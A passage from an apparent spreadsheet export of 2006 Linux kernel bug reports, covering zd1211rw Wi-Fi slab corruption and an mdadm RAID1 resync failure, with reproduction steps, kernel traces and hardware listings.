uhci_irq+0x122/0x138 [uhci_hcd] [&lt;e0bf3229&gt;] usb_hcd_irq+0x26/0x53 [usbcore] [&lt;c013829c&gt;] handle_IRQ_event+0x20/0x4d [&lt;c0139539&gt;] handle_level_irq+0x90/0xe3 [&lt;c0104fad&gt;] do_IRQ+0x87/0x9a [&lt;c01036ad&gt;] common_interrupt+0x25/0x2c [&lt;c0101b07&gt;] cpu_idle+0x3c/0x51 [&lt;c010053b&gt;] rest_init+0x1e/0x23 [&lt;c03c26cd&gt;] start_kernel+0x2e2/0x2e4 [&lt;00000000&gt;] 0x0 ======================= zd1211rw 1-1:1.0: firmware version 4725 zd1211rw 1-1:1.0: zd1211b chip 079b:0062 v4810 full 00-60-b3 AL2230_RF pa0 g--- zd1211rw 1-1:1.0: eth1 usbcore: registered new interface driver zd1211rw ieee80211_crypt: registered algorithm 'WEP' SoftMAC: Open Authentication completed with 00:16:41:8f:79:0d Steps to reproduce: Plug the USB Wifi adapter...</t>
  </si>
  <si>
    <t>zd1211rw + restricted key: slab corruption</t>
  </si>
  <si>
    <t>2006-10-01 09:14 UTC</t>
  </si>
  <si>
    <t>2006-11-15 13:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandriva 2007 RC2 Hardware Environment: i686-based desktop, USB Wifi adapter which appears to be a "Sagem XG76NA" (USB ID is 079b:0062, RF Type is AL2230). Software Environment: zd1211rw driver from http://dsd.object4.net/git/zd1211.git Problem Description: using key in restricted mode cause slab corruption error. These corruption is fully reproducible and may cause the system to freeze. Steps to reproduce: - boot to runlevel 1 - be sure udevd is up and firmware_class module is loaded - plug the adapter and run the following commands: ifconfig eth1 up iwconfig eth1 key restricted [your key] iwconfig eth1 essid [your essid] [root@calimero ~]# sh -x /test-zd.sh + iwconfig eth1 eth1 IEEE 802.11b/g ESSID:off/any Nickname:"zd1211" Mode:Managed Access Point: Invalid Encryption key:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 + ifconfig eth1 up + iwlist eth1 scanning eth1 Scan completed : Cell 01 - Address: 00:16:41:8F:79:0D ESSID:"Livebox-8ae5" Protocol:IEEE 802.11bg Mode:Master Channel:6 Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s 11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Quality=100/100 Signal level=11/100 IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK Extra: Last beacon: 292ms ago + iwconfig eth1 key restricted 1234-5678-9012-3456-7890-1234-56 + iwconfig eth1 essid Livebox-8ae5 [root@calimero ~]# [root@calimero ~]# dmesg | tail -20 zd1211rw 1-1:1.0: firmware version 4725 zd1211rw 1-1:1.0: zd1211b chip 079b:0062 v4810 full 00-60-b3 AL2230_RF pa0 g--- zd1211rw 1-1:1.0: eth1 usbcore: registered new interface driver zd1211rw ieee80211_crypt: registered algorithm 'WEP' slab error in verify_redzone_free(): cache `size-32': memory outside object was overwritten [&lt;c0103939&gt;] show_trace_log_lvl+0x12/0x25 [&lt;c0103a1a&gt;] show_trace+0xd/0x10 [&lt;c010412c&gt;] dump_stack+0x19/0x1b [&lt;c01504a1&gt;] __slab_error+0x17/0x1c [&lt;c015055a&gt;] cache_free_debugcheck+0xb4/0x18b [&lt;c0150bfd&gt;] kfree+0x71/0xbd [&lt;e104a681&gt;] ieee80211softmac_send_mgt_frame+0x3b1/0x3c0 [ieee80211softmac] [&lt;e104a865&gt;] ieee80211softmac_auth_challenge_response+0x1b/0x21 [ieee80211softmac] [&lt;c012488f&gt;] run_workqueue+0x82/0xc4 [&lt;c0124db5&gt;] worker_thread+0xe1/0x114 [&lt;c012728c&gt;] kthread+0xb0/0xdc [&lt;c0103853&gt;] kernel_thread_helper+0x7/0x10 ======================= cc32d3a8: redzone 1:0x170fc2a5, redzone 2:0xb666c946</t>
  </si>
  <si>
    <t>mdadm --add doesn't resync new partition before marking clean</t>
  </si>
  <si>
    <t>2006-10-02 22:24 UTC</t>
  </si>
  <si>
    <t>Robin Dunlop</t>
  </si>
  <si>
    <t>2006-10-04 22:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown, been unable to get stock ubuntu 6.06 to work, so upgraded to most recent rc, and then to 2.6.18 when it was released. I've tried using the CFQ scheduler instead of the pre-emptive, to no avail. Distribution: ubuntu Related Bug: 6965 may be related, as could be Bug 5556 (I uninstalled EVMS from my system to get rid of this error (and it got rid of it)) Summary: Adding 2nd Drive to RAID1 Array doesn't Sync new drive. Description: I have a RAID1 partition (I have many, but they all exhibit the problem) and it currently has only 1 disk attached to it. If I then take a blank partition, and add it to the existing raid array, it doesn't get synchronised. My Scenario: 0) Status of md array: root@mediapc:/mnt# cat /proc/mdstat Personalities : [raid0] [raid1] md0 : active raid1 sda1[0] 32000 blocks [2/1] [U_] unused devices: &lt;none&gt; 1) I cleaned my new disk partition: root@mediapc:/mnt# mdadm --zero-superblock /dev/sdb1 root@mediapc:/mnt# mdadm --examine /dev/sdb1 mdadm: No super block found on /dev/sdb1 (Expected magic a92b4efc, got 00000000) 2) I cleaned the filesystem: root@mediapc:/mnt# mkfs.jfs /dev/sdb1 mkfs.jfs version 1.1.8, 03-May-2005 Warning! All data on device /dev/sdb1 will be lost! Continue? (Y/N) y Format completed successfully. 32098 kilobytes total disk space. 3) I mounted both the source and destination partitions, just to see what the current status is: root@mediapc:/mnt# mount /dev/md0 src root@mediapc:/mnt# mount /dev/sdb1 dst root@mediapc:/mnt# ls src abi-2.6.15-26-386 grub initrd.img-2.6.18 System.map-2.6.18 config-2.6.15-26-386 hello memtest86+.bin vmlinuz-2.6.15-26-386 config-2.6.18 initrd.img-2.6.15-26-386 System.map-2.6.15-26-386 vmlinuz-2.6.18 root@mediapc:/mnt# ls dst root@mediapc:/mnt# 4) Unmount both partitions: root@mediapc:/mnt# umount src dst 5) Clear the log messages: root@mediapc:/mnt# dmesg -c 6) Add the new partition to the md array: root@mediapc:/mnt# mdadm /dev/md0 -a /dev/sdb1 mdadm: hot added /dev/sdb1 7) Review output of log files: root@mediapc:/mnt# dmesg [ 3420.974871] md: bind&lt;sdb1&gt; [ 3420.986300] RAID1 conf printout: [ 3420.986306] --- wd:1 rd:2 [ 3420.986310] disk 0, wo:0, o:1, dev:sda1 [ 3420.986313] disk 1, wo:1, o:1, dev:sdb1 [ 3420.986362] md: syncing RAID array md0 [ 3420.986366] md: minimum _guaranteed_ reconstruction speed: 1000 KB/sec/disc. [ 3420.986370] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for reconstruction. [ 3420.986375] md: using 128k window, over a total of 32000 blocks. [ 3420.986594] md: md0: sync done. [ 3420.986748] RAID1 conf printout: [ 3420.986750] --- wd:2 rd:2 [ 3420.986753] disk 0, wo:0, o:1, dev:sda1 [ 3420.986756] disk 1, wo:0, o:1, dev:sdb1 8) Inspect the md array: root@mediapc:/mnt# mdadm --query --detail /dev/md0 /dev/md0: Version : 00.90.03 Creation Time : Wed Sep 20 09:44:57 2006 Raid Level : raid1 Array Size : 32000 (31.26 MiB 32.77 MB) Device Size : 32000 (31.26 MiB 32.77 MB) Raid Devices : 2 Total Devices : 2 Preferred Minor : 0 Persistence : Superblock is persistent Update Time : Wed Sep 20 18:37:46 2006 State : clean Active Devices : 2 Working Devices : 2 Failed Devices : 0 Spare Devices : 0 UUID : 6f3f783f:15474052:2026fd5d:c3f1aca0 Events : 0.100 Number Major Minor RaidDevice State 0 8 1 0 active sync /dev/sda1 1 8 17 1 active sync /dev/sdb1 root@mediapc:/mnt# mdadm --examine /dev/sda1 /dev/sda1: Magic : a92b4efc Version : 00.90.03 UUID : 6f3f783f:15474052:2026fd5d:c3f1aca0 Creation Time : Wed Sep 20 09:44:57 2006 Raid Level : raid1 Raid Devices : 2 Total Devices : 2 Preferred Minor : 0 Update Time : Wed Sep 20 18:37:46 2006 State : clean Active Devices : 2 Working Devices : 2 Failed Devices : 0 Spare Devices : 0 Checksum : 9bee70cd - correct Events : 0.100 Number Major Minor RaidDevice State this 0 8 1 0 active sync /dev/sda1 0 0 8 1 0 active sync /dev/sda1 1 1 8 17 1 active sync /dev/sdb1 root@mediapc:/mnt# mdadm --examine /dev/sdb1 /dev/sdb1: Magic : a92b4efc Version : 00.90.03 UUID : 6f3f783f:15474052:2026fd5d:c3f1aca0 Creation Time : Wed Sep 20 09:44:57 2006 Raid Level : raid1 Raid Devices : 2 Total Devices : 2 Preferred Minor : 0 Update Time : Wed Sep 20 18:37:46 2006 State : clean Active Devices : 2 Working Devices : 2 Failed Devices : 0 Spare Devices : 0 Checksum : 9bee70df - correct Events : 0.100 Number Major Minor RaidDevice State this 1 8 17 1 active sync /dev/sdb1 0 0 8 1 0 active sync /dev/sda1 1 1 8 17 1 active sync /dev/sdb1 root@mediapc:/mnt# cat /proc/mdstat Personalities : [raid0] [raid1] md0 : active raid1 sdb1[1] sda1[0] 32000 blocks [2/2] [UU] unused devices: &lt;none&gt; 9) Break the mirror: root@mediapc:/mnt# mdadm /dev/md0 -f /dev/sdb1 -r /dev/sdb1 mdadm: set /dev/sdb1 faulty in /dev/md0 mdadm: hot removed /dev/sdb1 10) Mount the removed partition, see if the data was sync'd: root@mediapc:/mnt# mount /dev/sdb1 dst root@mediapc:/mnt# ls dst root@mediapc:/mnt# 11) Examine the 2 partitions superblocks: root@mediapc:/mnt# mdadm --examine /dev/sda1 /dev/sda1: Magic : a92b4efc Version : 00.90.03 UUID : 6f3f783f:15474052:2026fd5d:c3f1aca0 Creation Time : Wed Sep 20 09:44:57 2006 Raid Level : raid1 Raid Devices : 2 Total Devices : 1 Preferred Minor : 0 Update Time : Wed Sep 20 18:40:16 2006 State : clean Active Devices : 1 Working Devices : 1 Failed Devices : 1 Spare Devices : 0 Checksum : 9bee7153 - correct Events : 0.104 Number Major Minor RaidDevice State this 0 8 1 0 active sync /dev/sda1 0 0 8 1 0 active sync /dev/sda1 1 1 0 0 1 faulty removed root@mediapc:/mnt# mdadm --examine /dev/sdb1 /dev/sdb1: Magic : a92b4efc Version : 00.90.03 UUID : 6f3f783f:15474052:2026fd5d:c3f1aca0 Creation Time : Wed Sep 20 09:44:57 2006 Raid Level : raid1 Raid Devices : 2 Total Devices : 2 Preferred Minor : 0 Update Time : Wed Sep 20 18:37:46 2006 State : clean Active Devices : 2 Working Devices : 2 Failed Devices : 0 Spare Devices : 0 Checksum : 9bee70df - correct Events : 0.100 Number Major Minor RaidDevice State this 1 8 17 1 active sync /dev/sdb1 0 0 8 1 0 active sync /dev/sda1 1 1 8 17 1 active sync /dev/sdb1 If I do all these steps again, but do 'sync; sync' after adding /dev/sdb1 to the array, after breaking the array the new partition does have the data on it. Keywords: mdadm, raid, sync, sata Kernel Version: Linux version 2.6.18 (root@mediapc) (gcc version 4.0.3 (Ubuntu 4.0.3-1ubuntu5)) #1 PREEMPT Wed Sep 20 02:04:25 CST 2006 Linux Version: Ubuntu 6.06, with freshly installed kernel. root@mediapc:/usr/src/linux/scripts# sh ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux mediapc 2.6.18 #1 PREEMPT Wed Sep 20 02:04:25 CST 2006 i686 GNU/Linux Gnu C 4.0.3 Gnu make 3.81beta4 binutils 2.16.91 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.38 jfsutils 1.1.8 reiserfsprogs 3.6.19 reiser4progs 1.0.5 xfsprogs 2.7.7 pcmcia-cs 3.2.8 PPP 2.4.4b1 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.93 udev 079 Modules Loaded rfcomm l2cap bluetooth ppdev acpi_cpufreq cpufreq_userspa ce cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservat ive video sbs i2c_ec container button battery asus_acpi ac ipv6 af_packet snd_em u10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_seq_dummy snd_s eq_oss dm_mod snd_seq_midi snd_seq_midi_event snd_seq snd_emu10k1 snd_rawmidi sn d_ac97_codec snd_ac97_bus tsdev snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep snd rtc sk98lin floppy serio_ra w emu10k1_gp gameport soundcore skge pcspkr nvidia_agp agpgart forcedeth shpchp pci_hotplug i2c_nforce2 i2c_core sg sr_mod sbp2 evdev psmouse parport_pc lp parp ort ide_generic ehci_hcd ohci1394 ieee1394 ohci_hcd usbcore ide_cd cdrom sata_nv generic sd_mod amd74xx sata_sil libata scsi_mod thermal processor fan vga16fb v gastate Processor Info: root@mediapc:/usr/src/linux/scripts# cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 6 model name : AMD Athlon(tm) XP 1600+ stepping : 2 cpu MHz : 1397.900 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mp mmxext 3dnowext 3dnow ts bogomips : 2797.92 Module Info: root@mediapc:/usr/src/linux/scripts# cat /proc/modules rfcomm 39068 0 - Live 0xf10fb000 l2cap 24452 5 rfcomm, Live 0xf0bab000 bluetooth 52324 4 rfcomm,l2cap, Live 0xf109b000 ppdev 9348 0 - Live 0xf0b9e000 acpi_cpufreq 7052 0 - Live 0xf108f000 cpufreq_userspace 4244 0 - Live 0xf1098000 cpufreq_stats 5892 0 - Live 0xf1095000 freq_table 4868 2 acpi_cpufreq,cpufreq_stats, Live 0xf1092000 cpufreq_powersave 2048 0 - Live 0xf1071000 cpufreq_ondemand 6380 0 - Live 0xf108c000 cpufreq_conservative 6816 0 - Live 0xf1089000 video 16004 0 - Live 0xf107e000 sbs 14624 0 - Live 0xf1084000 i2c_ec 5248 1 sbs, Live 0xf107b000 container 4608 0 - Live 0xf1078000 button 6800 0 - Live 0xf1075000 battery 9988 0 - Live 0xf0f4b000 asus_acpi 15384 0 - Live 0xf1041000 ac 5380 0 - Live 0xf103e000 ipv6 256448 8 - Live 0xf10bb000 af_packet 22152 4 - Live 0xf106a000 snd_emu10k1_synth 7552 0 - Live 0xf103b000 snd_emux_synth 36224 1 snd_emu10k1_synth, Live 0xf1060000 snd_seq_virmidi 7424 1 snd_emux_synth, Live 0xf1038000 snd_seq_midi_emul 6784 1 snd_emux_synth, Live 0xf1035000 snd_seq_dummy 3972 0 - Live 0xf0e98000 snd_seq_oss 32868 0 - Live 0xf1056000 dm_mod 56628 0 - Live 0xf1047000 snd_seq_midi 8992 0 - Live 0xf1031000 snd_seq_midi_event 7808 3 snd_seq_virmidi,snd_seq_oss,snd_seq_midi, Live 0xf0eea000 snd_seq 50892 9 snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq_midi_event, Live 0xf0f01000 snd_emu10k1 116288 2 snd_emu10k1_synth, Live 0xf0f64000 snd_rawmidi 25120 3 snd_seq_virmidi,snd_seq_midi,snd_emu10k1, Live 0xf0f43000 snd_ac97_codec 92832 1 snd_emu10k1, Live 0xf0f82000 snd_ac97_bus 2560 1 snd_ac97_codec, Live 0xf0e7e000 tsdev 8256 0 - Live 0xf0ee6000 snd_pcm_oss 44192 0 - Live 0xf0f37000 snd_mixer_oss 16896 1 snd_pcm_oss, Live 0xf0eed000 snd_pcm 77960 3 snd_emu10k1,snd_ac97_codec,snd_pcm_oss, Live 0xf0f4f000 snd_seq_device 8460 8 snd_emu10k1_synth,snd_emux_synth,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq,snd_emu10k1,snd_rawmidi, Live 0xf0ee2000 snd_timer 23684 3 snd_seq,snd_emu10k1,snd_pcm, Live 0xf0eb8000 snd_page_alloc 10248 2 snd_emu10k1,snd_pcm, Live 0xf0ea4000 snd_util_mem 4992 2 snd_emux_synth,snd_emu10k1, Live 0xf0e70000 snd_hwdep 9604 2 snd_emux_synth,snd_emu10k1, Live 0xf0e94000 snd 51328 15 snd_emux_synth,snd_seq_virmidi,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_seq_device,snd_timer,snd_hwdep, Live 0xf0ef3000 rtc 13620 0 - Live 0xf0e9a000 sk98lin 157024 0 - Live 0xf0f0f000 floppy 58892 0 - Live 0xf0ea8000 serio_raw 7172 0 - Live 0xf0e91000 emu10k1_gp 4096 0 - Live 0xf0cce000 gameport 15368 2 emu10k1_gp, Live 0xf0e4d000 soundcore 10080 1 snd, Live 0xf0e1f000 skge 38928 0 - Live 0xf0e73000 pcspkr 3072 0 - Live 0xf0e46000 nvidia_agp 8476 1 - Live 0xf0e23000 agpgart 32688 1 nvidia_agp, Live 0xf0e5e000 forcedeth 43140 0 - Live 0xf0e52000 shpchp 37660 0 - Live 0xf0e2e000 pci_hotplug 32824 1 shpchp, Live 0xf0e3a000 i2c_nforce2 7424 0 - Live 0xf0cd7000 i2c_core 22032 2 i2c_ec,i2c_nforce2, Live 0xf0e27000 sg 34972 0 - Live 0xf0ce8000 sr_mod 16548 0 - Live 0xf0d58000 sbp2 23432 0 - Live 0xf0d51000 evdev 10112 1 - Live 0xf0ce4000 psmouse 38536 0 - Live 0xf0d46000 parport_pc 35568 1 - Live 0xf0d3c000 lp 11968 0 - Live 0xf0cd3000 parport 36424 3 ppdev,parport_pc,lp, Live 0xf0cda000 ide_generic 1536 0 [permanent], Live 0xf0ca0000 ehci_hcd 32904 0 - Live 0xf0c69000 ohci1394 34992 0 - Live 0xf0c5f000 ieee1394 297656 2 sbp2,ohci1394, Live 0xf0cf2000 ohci_hcd 21252 0 - Live 0xf0bf2000 usbcore 127264 3 ehci_hcd,ohci_hcd, Live 0xf0c75000 ide_cd 39968 0 - Live 0xf0c44000 cdrom 36656 2 sr_mod,ide_cd, Live 0xf0c3a000 sata_nv 11524 0 - Live 0xf0be6000 generic 5252 0 [permanent], Live 0xf0bd5000 sd_mod 21392 7 - Live 0xf0bda000 amd74xx 15260 0 [permanent], Live 0xf0bbd000 sata_sil 12040 5 - Live 0xf0bc2000 libata 101780 2 sata_nv,sata_sil, Live 0xf0c20000 scsi_mod 135404 5 sg,sr_mod,sbp2,sd_mod,libata, Live 0xf0bfd000 thermal 13960 0 - Live 0xf0bcd000 processor 24492 2 acpi_cpufreq,thermal, Live 0xf0bc6000 fan 5124 0 - Live 0xf0bba000 vga16fb 12684 0 - Live 0xf0b93000 vgastate 9856 1 vga16fb, Live 0xf0b8f000 Loaded Driver and hardware information: root@mediapc:/usr/src/linux/scripts# cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 02f8-02ff : serial 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vga+ 03f2-03f5 : floppy 03f7-03f7 : floppy DIR 03f8-03ff : serial 0778-077a : parport0 0cf8-0cff : PCI conf1 4000-407f : motherboard 4000-4003 : ACPI PM1a_EVT_BLK 4004-4005 : ACPI PM1a_CNT_BLK 4008-400b : ACPI PM_TMR 4020-4027 : ACPI GPE0_BLK 4080-40ff : motherboard 4080-40ff : pnp 00:00 4200-427f : motherboard 4200-427f : pnp 00:00 4280-42ff : motherboard 4280-42ff : pnp 00:00 4400-447f : motherboard 4400-447f : pnp 00:00 4480-44ff : motherboard 44a0-44af : ACPI GPE1_BLK 5000-503f : motherboard 5000-503f : pnp 00:01 5000-5007 : nForce2_smbus 5500-553f : motherboard 5500-553f : pnp 00:01 5500-5507 : nForce2_smbus 9000-afff : PCI Bus #01 9000-90ff : 0000:01:04.0 9000-90ff : skge 9400-941f : 0000:01:07.0 9400-941f : EMU10K1 9800-9807 : 0000:01:07.1 9800-9807 : emu10k1-gp 9c00-9c07 : 0000:01:0b.0 9c00-9c07 : sata_sil a000-a003 : 0000:01:0b.0 a000-a003 : sata_sil a400-a407 : 0000:01:0b.0 a400-a407 : sata_sil a800-a803 : 0000:01:0b.0 a800-a803 : sata_sil ac00-ac0f : 0000:01:0b.0 ac00-ac0f : sata_sil c800-c81f : 0000:00:01.1 cc00-cc07 : 0000:00:04.0 cc00-cc07 : forcedeth f000-f00f : 0000:00:09.0 f000-f007 : ide0 f008-f00f : ide1 root@mediapc:/usr/src/linux/scripts# cat /proc/iomem 00000000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cf7ff : Video ROM 000d4000-000d87ff : Adapter ROM 000f0000-000fffff : System ROM 00100000-2ffeffff : System RAM 00100000-0031cef7 : Kernel code 0031cef8-003bac73 : Kernel data 2fff0000-2fff2fff : ACPI Non-volatile Storage 2fff3000-2fffffff : ACPI Tables 40000000-400fffff : PCI Bus #01 40000000-4007ffff : 0000:01:0b.0 40080000-4009ffff : 0000:01:04.0 d0000000-dfffffff : PCI Bus #03 d0000000-dfffffff : 0000:03:00.0 e0000000-e3ffffff : 0000:00:00.0 e5000000-e6ffffff : PCI Bus #03 e5000000-e5ffffff : 0000:03:00.0 e6000000-e601ffff : 0000:03:00.0 e7000000-e8ffffff : PCI Bus #01 e8000000-e8003fff : 0000:01:04.0 e8000000-e8003fff : skge e8004000-e80041ff : 0000:01:0b.0 e8004000-e80041ff : sata_sil e9001000-e9001fff : 0000:00:02.0 e9001000-e9001fff : ohci_hcd e9002000-e9002fff : 0000:00:02.1 e9002000-e9002fff : ohci_hcd e9003000-e90037ff : 0000:00:0d.0 e9003000-e90037ff : ohci1394 e9004000-e900403f : 0000:00:0d.0 e9005000-e90050ff : 0000:00:02.2 e9005000-e90050ff : ehci_hcd e9006000-e9006fff : 0000:00:04.0 e9006000-e9006fff : forcedeth fec00000-fec00fff : reserved fee00000-fee00fff : reserved ffff0000-ffffffff : reserved PCI Information: root@mediapc:/usr/src/linux/scripts# lspci -vvv 0000:00:00.0 Host bridge: nVidia Corporation nForce2 AGP (different version?) (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=64M] Capabilities: [40] AGP version 3.0 Status: RQ=32 Iso- ArqSz=2 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=x4 Capabilities: [60] #08 [2001] 0000:00:00.1 RAM memory: nVidia Corporation nForce2 Memory Controller 1 (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:00.2 RAM memory: nVidia Corporation nForce2 Memory Controller 4 (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:00.3 RAM memory: nVidia Corporation nForce2 Memory Controller 3 (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:00.4 RAM memory: nVidia Corporation nForce2 Memory Controller 2 (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:00.5 RAM memory: nVidia Corporation nForce2 Memory Controller 5 (rev c1) Subsystem: ASUSTeK Computer Inc.: Unknown device 80ac Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 0000:00:01.0 ISA bridge: nVidia Corporation nForce2 ISA Bridge (rev a4) Subsystem: ASUSTeK Computer Inc. A7N8X Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [48] #08 [01e1] 0000:00:01.1 SMBus: nVidia Corporation nForce2 SMBus (MCP) (rev a2) Subsystem: ASUSTeK Computer Inc.: Unknown device 0c11 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at c800 [size=32] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:02.0 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. A7N8X Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 185 Region 0: Memory at e9001000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:02.1 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. A7N8X Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin B routed to IRQ 193 Region 0: Memory at e9002000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:02.2 USB Controller: nVidia Corporation nForce2 USB Controller (rev a4) (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. A7N8X Mainboard Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin C routed to IRQ 185 Region 0: Memory at e9005000 (32-bit, non-prefetchable) [size=256] Capabilities: [44] #0a [2080] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:04.0 Ethernet controller: nVidia Corporation nForce2 Ethernet Controller (rev a1) Subsystem: ASUSTeK Computer Inc. A7N8X Mainboard onboard nForce2 Ethernet Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 193 Region 0: Memory at e9006000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at cc00 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: 